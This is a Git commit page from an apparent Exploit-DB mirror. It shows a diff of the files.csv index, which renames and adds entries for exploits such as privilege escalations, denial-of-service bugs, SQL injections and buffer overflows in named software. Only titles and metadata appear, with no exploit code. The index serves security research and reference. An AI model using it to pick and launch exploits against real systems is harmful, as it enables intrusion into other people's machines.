bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-03-31

Browse source 
4 new exploits

dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow (PoC)
dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow (PoC)

Spider Solitaire -  Denial of Service (PoC)
Spider Solitaire - Denial of Service (PoC)

Baby FTP Server 1.24 - Denial of Service
Baby FTP Server 1.24 - Denial of Service (1)

Baby FTP server 1.24 - Denial of Service
Baby FTP server 1.24 - Denial of Service (2)

Google Android -  Unprotected MSRs in EL1 RKP Privilege Escalation
Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation

Evostream Media Server 1.7.1  (x64) - Denial of Service
Evostream Media Server 1.7.1 (x64) - Denial of Service

Cerberus FTP Server  8.0.10.1 - Denial of Service
Cerberus FTP Server 8.0.10.1 - Denial of Service

Apple macOS/IOS 10.12.2(16C67) - mach_msg Heap Overflow

Apache < 2.0.64  / < 2.2.21 mod_setenvif - Integer Overflow
Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow

Solaris 10 sysinfo() - Local Kernel Memory Disclosure
Solaris 10 sysinfo() - Local Kernel Memory Disclosure (1)

Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure
Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)

Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit)
Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) -  (Sendmail) Capabilities Privilege Escalation(1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) -  (Sendmail 8.10.1) Capabilities Privilege Escalation (2)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2)

Linux Kernel 3.13 -  (SGID) Privilege Escalation (PoC)
Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC)

Linux espfix64 -  (Nested NMIs Interrupting) Privilege Escalation
Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation
Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)
Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)
Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (2)
Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (1)
Forticlient 5.2.3 Windows 10 x64 (Pre Anniversary) - Privilege Escalation
Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation
Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Privilege Escalation
Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Privilege Escalation

Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via UserNamespace Privilege Escalation
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation

Ubuntu 15.04 (Dev) - 'Upstart' Logrotation Privilege Escalation
Ubuntu 15.04 (Development) - 'Upstart' Logrotation Privilege Escalation

Linux Kernel 2.6.32 (Ubuntu 10.04) - /proc Handling SUID Privilege Escalation

Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)

Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2)

Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow (1)
Yahoo! Music Jukebox 2.2 - 'AddImage()' ActiveX Remote Buffer Overflow (1)

dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow
dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow

Apache Tomcat < 6.0.18 - utf8 Directory Traversal (1)
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)

Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (1)
Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (1)

Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray
Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (2)

EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow
EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (1)

Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal

Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit)
Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (2)

Samba 2.2.2 < 2.2.6 - nttrans Buffer Overflow (Metasploit)
Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (2)

EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow
EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (2)

Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)

Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)

D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (2)
D-Link Devices - 'command.php' Unauthenticated Remote Command Execution (Metasploit)

D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (1)
D-Link Devices - 'tools_vct.xgi' Unauthenticated Remote Command Execution (Metasploit)

Azure Data Expert Ultimate  2.2.16 - Buffer Overflow
Azure Data Expert Ultimate 2.2.16 - Buffer Overflow

Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit)
Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)

Article Script 1.6.3 - 'rss.php' SQL Injection (1)
Article Script 1.6.3 - 'rss.php' SQL Injection

DBHcms 1.1.4 - Remote File Inclusion
DBHcms 1.1.4 - 'code' Remote File Inclusion

LaserNet CMS 1.5 - SQL Injection (2)
LaserNet CMS 1.5 - SQL Injection

Clever Copy 3.0 - 'postview.php' SQL Injection (1)
Clever Copy 3.0 - 'postview.php' SQL Injection

phpAuction - 'profile.php' SQL Injection
phpAuction - 'profile.php' SQL Injection (1)

Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection
Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection (1)

Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection
Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection (2)

Matterdaddy Market 1.1 - Multiple SQL Injections (1)
Matterdaddy Market 1.1 - 'index.php' Multiple SQL Injections

PHPWebGallery 1.3.4 - Blind SQL Injection
PHPWebGallery 1.3.4 - Blind SQL Injection (1)

PHPWebGallery 1.3.4 - Blind SQL Injection
PHPWebGallery 1.3.4 - Blind SQL Injection (2)

Zeeways Shaadi Clone 2.0 - Authentication Bypass
Zeeways Shaadi Clone 2.0 - Authentication Bypass (1)

Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities
Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (1)

DBHcms 1.1.4 - Remote File Inclusion
DBHcms 1.1.4 - 'dbhcms_core_dir' Remote File Inclusion

E-book Store - Multiple Vulnerabilities (1)

Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (1)

E-book Store - Multiple Vulnerabilities (2)
E-book Store - Multiple Vulnerabilities

Classifieds Script - SQL Injection
Classifieds Script - 'rate' SQL Injection

Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (2)

DBHcms 1.1.4 - SQL Injection
DBHcms 1.1.4 - 'dbhcms_pid' SQL Injection

LaserNet CMS 1.5 - SQL Injection (1)

Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection
Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection (2)

Article Script 1.6.3 - 'rss.php' SQL Injection (2)

Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection
Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection (1)

Openads (PHPAdsNew) <  2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion
Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion

LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting
LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting (1)

LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting
LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting (2)
Fonality trixbox 2.4.2 - Cross-Site Scripting
Fonality trixbox 2.4.2 - Cross-Site Scripting (1)
Fonality trixbox 2.4.2 - Cross-Site Scripting (2)

Clever Copy 3.0 - 'postview.php' SQL Injection (2)

phpAuction - 'profile.php' SQL Injection
phpAuction - 'profile.php' SQL Injection (2)

Zeeways Shaadi Clone 2.0 - Authentication Bypass
Zeeways Shaadi Clone 2.0 - Authentication Bypass (2)

DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Inclusion

Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities
Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (2)

Matterdaddy Market 1.1 - Multiple SQL Injections (2)
Matterdaddy Market 1.1 - 'cat_name' Multiple SQL Injections

WordPress Plugin WP Private Messages 1.0.1 - SQL Injection
WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (1)

Huawei Flybox B660 - Cross-Site Request Forgery
Huawei Flybox B660 - Cross-Site Request Forgery (1)

Huawei Flybox B660 - Cross-Site Request Forgery
Huawei Flybox B660 - Cross-Site Request Forgery (2)

Classifieds Script - SQL Injection
Classifieds Script - 'term' SQL Injection

WordPress Plugin WP Private Messages 1.0.1 - SQL Injection
WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (2)
This commit is contained in:
Offensive Security 2017-03-31 05:01:16 +00:00
parent 8e03027ae5
commit 6d17bc529d
20 changed files with 3190 additions and 180 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

153
files.csv
View file

@ -689,7 +689,7 @@ id,file,description,date,author,platform,type,port
5044,platforms/windows/dos/5044.pl,"Ipswitch WS_FTP Server with SSH 6.1.0.0 - Remote Buffer Overflow (PoC)",2008-02-03,securfrog,windows,dos,0
5054,platforms/hardware/dos/5054.c,"MicroTik RouterOS 3.2 - SNMPd snmp-set Denial of Service",2008-02-03,ShadOS,hardware,dos,0
5063,platforms/windows/dos/5063.pl,"NERO Media Player 1.4.0.35b - '.m3u' File Buffer Overflow (PoC)",2008-02-05,securfrog,windows,dos,0
5067,platforms/windows/dos/5067.pl,"dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow (PoC)",2008-02-05,securfrog,windows,dos,0
5067,platforms/windows/dos/5067.pl,"dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow (PoC)",2008-02-05,securfrog,windows,dos,0
5085,platforms/windows/dos/5085.txt,"jetAudio 7.0.5 - '.asx' Remote Stack Overflow (PoC)",2008-02-08,"laurent gaffié",windows,dos,0
5086,platforms/windows/dos/5086.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow (PoC)",2008-02-08,Trancek,windows,dos,0
5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 - 'QTPlugin.ocx' Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié",windows,dos,0
@ -1227,7 +1227,7 @@ id,file,description,date,author,platform,type,port
9901,platforms/linux/dos/9901.txt,"Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - Denial of Service (PoC)",2009-10-23,"Zeus Penguin",linux,dos,80
9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 - Denial of Service",2009-10-14,"Townsend Harris",hardware,dos,0
9969,platforms/multiple/dos/9969.txt,"Snort 2.8.5 - IPv6 Denial of Service",2009-10-23,"laurent gaffie",multiple,dos,0
9971,platforms/windows/dos/9971.php,"Spider Solitaire - Denial of Service (PoC)",2009-10-15,SirGod,windows,dos,0
9971,platforms/windows/dos/9971.php,"Spider Solitaire - Denial of Service (PoC)",2009-10-15,SirGod,windows,dos,0
9980,platforms/hardware/dos/9980.txt,"Websense Email Security - Denial of Service",2009-10-20,"Nikolas Sotiriu",hardware,dos,0
9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060
9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21
@ -3428,7 +3428,7 @@ id,file,description,date,author,platform,type,port
26342,platforms/linux/dos/26342.txt,"RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String",2005-10-11,"Tan Chew Keong",linux,dos,0
26382,platforms/linux/dos/26382.c,"Linux Kernel 2.6.x - IPv6 Local Denial of Service",2005-10-20,"Rémi Denis-Courmont",linux,dos,0
26413,platforms/windows/dos/26413.py,"PEiD 0.95 - Memory Corruption (PoC)",2013-06-24,"Debasish Mandal",windows,dos,0
26450,platforms/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service",2013-06-26,Chako,windows,dos,21
26450,platforms/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service (1)",2013-06-26,Chako,windows,dos,21
26457,platforms/windows/dos/26457.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (1)",2005-11-01,ad@class101.org,windows,dos,0
26489,platforms/linux/dos/26489.c,"Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service",2005-11-09,"Rémi Denis-Courmont",linux,dos,0
26517,platforms/windows/dos/26517.txt,"Microsoft PowerPoint 2007 - Crash (PoC)",2013-07-01,Asesino04,windows,dos,0
@ -3609,7 +3609,7 @@ id,file,description,date,author,platform,type,port
28293,platforms/multiple/dos/28293.txt,"Oracle 10g - Alter Session Integer Overflow",2006-07-27,"putosoft softputo",multiple,dos,0
28299,platforms/windows/dos/28299.pl,"Microsoft Windows XP/2000/2003 - Graphical Device Interface Plus Library Denial of Service",2006-07-29,"Mr. Niega",windows,dos,0
28301,platforms/windows/dos/28301.txt,"Microsoft Internet Explorer 6 - Deleted Frame Object Denial of Service",2006-07-29,hdm,windows,dos,0
40639,platforms/windows/dos/40639.py,"Baby FTP server 1.24 - Denial of Service",2016-10-27,n30m1nd,windows,dos,0
40639,platforms/windows/dos/40639.py,"Baby FTP server 1.24 - Denial of Service (2)",2016-10-27,n30m1nd,windows,dos,0
28338,platforms/linux/dos/28338.txt,"Vino VNC Server 3.7.3 - Persistent Denial of Service",2013-09-17,"Trustwave's SpiderLabs",linux,dos,5900
28341,platforms/windows/dos/28341.txt,"Yahoo! Messenger 8.0.0.863 - File Extension Spoofing",2006-08-04,ivancool2003,windows,dos,0
28343,platforms/windows/dos/28343.txt,"Microsoft Internet Explorer 6.0/7.0 - IFrame Refresh Denial of Service",2006-08-06,"Thomas Pollet",windows,dos,0
@ -5351,7 +5351,7 @@ id,file,description,date,author,platform,type,port
41165,platforms/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
41192,platforms/multiple/dos/41192.c,"OpenSSL 1.1.0 - Remote Client Denial of Service",2017-01-26,"Guido Vranken",multiple,dos,0
41211,platforms/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",android,dos,0
41212,platforms/android/dos/41212.txt,"Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation",2017-02-01,"Google Security Research",android,dos,0
41212,platforms/android/dos/41212.txt,"Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation",2017-02-01,"Google Security Research",android,dos,0
41213,platforms/osx/dos/41213.html,"Apple WebKit - 'HTMLFormElement::reset()' Use-After Free",2017-02-01,"Google Security Research",osx,dos,0
41214,platforms/multiple/dos/41214.html,"Google Chrome - 'HTMLKeygenElement::shadowSelect()' Type Confusion",2017-02-01,"Google Security Research",multiple,dos,0
41215,platforms/multiple/dos/41215.html,"Apple WebKit - 'HTMLKeygenElement' Type Confusion",2017-02-01,"Google Security Research",multiple,dos,0
@ -5388,9 +5388,9 @@ id,file,description,date,author,platform,type,port
41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
41537,platforms/hardware/dos/41537.py,"Conext ComBox 865-1058 - Denial of Service",2017-03-02,"Mark Liapustin and Arik Kublanov",hardware,dos,0
41547,platforms/windows/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",windows,dos,0
41547,platforms/windows/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",windows,dos,0
41565,platforms/hardware/dos/41565.py,"Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service",2017-03-09,"Quentin Olagne",hardware,dos,0
41596,platforms/windows/dos/41596.py,"Cerberus FTP Server 8.0.10.1 - Denial of Service",2017-03-13,"Peter Baris",windows,dos,0
41596,platforms/windows/dos/41596.py,"Cerberus FTP Server 8.0.10.1 - Denial of Service",2017-03-13,"Peter Baris",windows,dos,0
41601,platforms/hardware/dos/41601.c,"MikroTik Router - ARP Table OverFlow Denial Of Service",2017-03-05,FarazPajohan,hardware,dos,0
41608,platforms/multiple/dos/41608.txt,"Adobe Flash - Metadata Parsing Out-of-Bounds Read",2017-03-15,"Google Security Research",multiple,dos,0
41609,platforms/multiple/dos/41609.txt,"Adobe Flash - MovieClip Attach init Object Use-After-Free",2017-03-15,"Google Security Research",multiple,dos,0
@ -5425,6 +5425,7 @@ id,file,description,date,author,platform,type,port
41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2(16C67) - mach_msg Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0
41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0
41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0
@ -5436,7 +5437,7 @@ id,file,description,date,author,platform,type,port
41756,platforms/windows/dos/41756.txt,"Microsoft Outlook - HTML Email Denial of Service",2017-03-28,"Haifei Li",windows,dos,0
41767,platforms/linux/dos/41767.txt,"Linux Kernel (Ubuntu 11.10/12.04) - binfmt_script Stack Data Disclosure",2014-01-14,halfdog,linux,dos,0
41768,platforms/linux/dos/41768.txt,"Apache 2.2 - Scoreboard Invalid Free On Shutdown",2012-01-11,halfdog,linux,dos,0
41769,platforms/linux/dos/41769.txt,"Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow",2011-11-02,halfdog,linux,dos,0
41769,platforms/linux/dos/41769.txt,"Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow",2011-11-02,halfdog,linux,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5768,7 +5769,7 @@ id,file,description,date,author,platform,type,port
2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Privilege Escalation",2006-07-18,"Marco Ivaldi",linux,local,0
2056,platforms/windows/local/2056.c,"Microsoft IIS - ASP Stack Overflow (MS06-034)",2006-07-21,cocoruder,windows,local,0
2065,platforms/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)",2006-07-23,"Luigi Auriemma",windows,local,0
2067,platforms/solaris/local/2067.c,"Solaris 10 sysinfo() - Local Kernel Memory Disclosure",2006-07-24,prdelka,solaris,local,0
2067,platforms/solaris/local/2067.c,"Solaris 10 sysinfo() - Local Kernel Memory Disclosure (1)",2006-07-24,prdelka,solaris,local,0
2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 - Local Code Execution (French)",2006-07-30,NSRocket,windows,local,0
2094,platforms/windows/local/2094.c,"Open Cubic Player 2.6.0pre6 / 0.1.10_rc5 - Multiple Buffer Overflow",2006-07-31,"Luigi Auriemma",windows,local,0
2106,platforms/osx/local/2106.pl,"Apple Mac OSX 10.4.7 (x86) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0
@ -5778,7 +5779,7 @@ id,file,description,date,author,platform,type,port
2144,platforms/linux/local/2144.sh,"liblesstif 2-0.93.94-4mdk - (DEBUG_FILE) Privilege Escalation",2006-08-08,"Karol Wiesek",linux,local,0
2152,platforms/php/local/2152.php,"PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow (PoC)",2006-08-08,Heintz,php,local,0
2193,platforms/linux/local/2193.php,"PHP 4.4.3 / 5.1.4 - (sscanf) Local Buffer Overflow",2006-08-16,Andi,linux,local,0
2241,platforms/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure",2006-08-22,"Marco Ivaldi",solaris,local,0
2241,platforms/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)",2006-08-22,"Marco Ivaldi",solaris,local,0
2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 - '/usr/ucb/ps' Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0
2264,platforms/windows/local/2264.htm,"VMware 5.5.1 - (ActiveX) Local Buffer Overflow",2006-08-27,c0ntex,windows,local,0
2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 - '.ZIP' File Handling Local Buffer Overflow",2006-08-30,bratax,windows,local,0
@ -6393,7 +6394,7 @@ id,file,description,date,author,platform,type,port
10359,platforms/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - '.pls' Universal Local Buffer Overflow",2009-12-09,mr_me,windows,local,0
10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)",2009-12-09,dookie,windows,local,0
10371,platforms/windows/local/10371.pl,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (1)",2009-12-10,germaya_x,windows,local,0
10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit)",2009-12-10,"loneferret germaya_x",windows,local,0
10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (1)",2009-12-10,"loneferret germaya_x",windows,local,0
10374,platforms/windows/local/10374.pl,"Easy RM to MP3 Converter 2.7.3.700 - Exploit",2009-12-10,"Vinod Sharma",windows,local,0
10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - '.pls' Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local,0
10396,platforms/linux/local/10396.pl,"Mozilla Codesighs - Memory Corruption (PoC)",2009-12-12,"Jeremy Brown",linux,local,0
@ -7365,8 +7366,8 @@ id,file,description,date,author,platform,type,port
19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0
19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local,0
19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0
20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local,0
20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2)",2000-06-07,"Wojciech Purczynski",linux,local,0
20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local,0
20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2)",2000-06-07,"Wojciech Purczynski",linux,local,0
20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 - SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0
20003,platforms/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 - Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local,0
20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 - restore Buffer Overflow",2000-06-07,"Stan Bubrouski",linux,local,0
@ -8337,7 +8338,7 @@ id,file,description,date,author,platform,type,port
33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit (Metasploit)",2014-06-17,Metasploit,arm,local,0
33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0
33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC)",2014-06-21,"Vitaly Nikolenko",linux,local,0
33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC)",2014-06-21,"Vitaly Nikolenko",linux,local,0
33892,platforms/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,windows,local,0
33893,platforms/windows/local/33893.rb,"Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)",2014-06-27,Metasploit,windows,local,0
33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Privilege Escalation",2014-06-28,"Thomas Stangner",linux,local,0
@ -8515,7 +8516,7 @@ id,file,description,date,author,platform,type,port
37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0
37710,platforms/linux/local/37710.txt,"Sudo 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
37722,platforms/lin_x86-64/local/37722.c,"Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation",2015-08-05,"Andrew Lutomirski",lin_x86-64,local,0
37722,platforms/lin_x86-64/local/37722.c,"Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation",2015-08-05,"Andrew Lutomirski",lin_x86-64,local,0
37724,platforms/lin_x86/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",lin_x86,local,0
37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' Buffer Overflow (SEH)",2015-08-07,"Saeid Atabaki",windows,local,0
37732,platforms/win_x86/local/37732.c,"Microsoft Windows XP SP3 x86 / 2003 SP2 (x86) - 'NDProxy' Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local,0
@ -8637,8 +8638,8 @@ id,file,description,date,author,platform,type,port
39284,platforms/windows/local/39284.txt,"Oracle - HtmlConverter.exe Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0
39285,platforms/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",linux,local,0
40337,platforms/win_x86-64/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local,0
